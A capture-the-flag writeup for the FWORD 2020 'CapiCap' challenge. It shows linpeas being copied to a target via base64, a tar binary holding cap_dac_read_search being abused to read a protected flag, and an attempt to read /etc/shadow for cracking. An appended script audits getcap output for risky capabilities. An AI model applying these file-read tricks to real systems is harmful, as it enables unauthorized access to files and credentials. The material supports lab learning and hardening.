Tags: capabilities

# fword-ctf-writeups
Writeup for FWORD 2020 CTF

---
CapiCap
---
This challenge was quite nice. I actually spent a great deal of time just to put linpeas on the box; I ended up converting the linpeas script to base64, then copied and pasted it in the machine using echo (there's probably a better way to do this, but I was too lazy to think of anything else).
so at my attack machine:

cat linpeas.sh | base64 > linpeas.b64

copy the result

on target host:

echo "base64 string" > linpeas.b64

cat linpeas.b64 | base64 -d > linpeas.sh

at first I missed it, so it took me quite some time.

actually the name of the challenge gives us a hint.

running the following:

getcap -r / 2>/dev/null

gives us:

/usr/bin/tar = cap_dac_read_search+ep

this caught my attention as I do not normally see this.

after doing some research, I found out that this actually gives tar permission to read any file!

so I initially tried to read /etc/shadow and crack the hash - that got me nowhere.

it took me a minute to realize I just need the flag.txt file!

so doing this:

cd /tmp # so we will be somewhere with write permissions

tar -cvf flag.tar ~/flag.txt # read the flag file from the home directory, and store it in flag.tar

tar -xvf flag.tar # extract the flag file

now we can:

cat /tmp/home/user1/flag.txt

FwordCTF{C4pAbiLities_4r3_t00_S3Cur3_NaruT0_0nc3_S4id}

and we got the flag!
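
For the defensive side of the `getcap -r /` finding above, here is an added example (not part of the original writeup) that audits getcap output for capabilities that bypass file permission checks, such as the `cap_dac_read_search` set on tar here. The `RISKY_CAPS` shortlist, the function names and the sample lines are assumptions made for this example.

```shell
#!/bin/sh
# Added example (not from the writeup): flag file capabilities that bypass
# file permission checks in the output of `getcap -r / 2>/dev/null`.

# Assumption: this shortlist is the example's own choice of capabilities worth review.
RISKY_CAPS="cap_dac_read_search cap_dac_override cap_setuid cap_setgid cap_sys_admin cap_sys_ptrace cap_sys_module cap_chown cap_fowner"

# Reads getcap output on stdin; prints "<path><TAB><capability>" per finding.
# Handles one capability clause per line (the common case).
audit_caps() {
  awk -v risky="$RISKY_CAPS" '
    BEGIN { n = split(risky, r, " "); for (i = 1; i <= n; i++) bad[r[i]] = 1 }
    NF >= 2 {
      spec = $NF                          # e.g. cap_dac_read_search+ep
      path = $0
      sub(/[ \t]+[^ \t]+$/, "", path)     # drop the capability clause
      sub(/[ \t]+=$/, "", path)           # older libcap prints "path = caps"
      op = match(spec, /[+=]/)            # newer libcap prints "path caps=ep"
      if (!op) next
      flags = substr(spec, op + 1)
      if (flags !~ /[ep]/) next           # inheritable-only grants nothing by itself
      m = split(substr(spec, 1, op - 1), caps, ",")
      for (j = 1; j <= m; j++)
        if (caps[j] in bad) printf "%s\t%s\n", path, caps[j]
    }'
}

# Constructed sample input; only the first line matches the writeup's finding.
sample_getcap_output() {
  cat <<'EOF'
/usr/bin/tar = cap_dac_read_search+ep
/usr/bin/ping cap_net_raw=ep
/opt/demo/backup agent = cap_dac_override,cap_net_bind_service+eip
/opt/demo/helper = cap_sys_admin+i
EOF
}

sample_getcap_output | audit_caps
```

On a real host, pipe `getcap -r / 2>/dev/null` into `audit_caps`; a capability that is not needed can be cleared with `setcap -r <path>`.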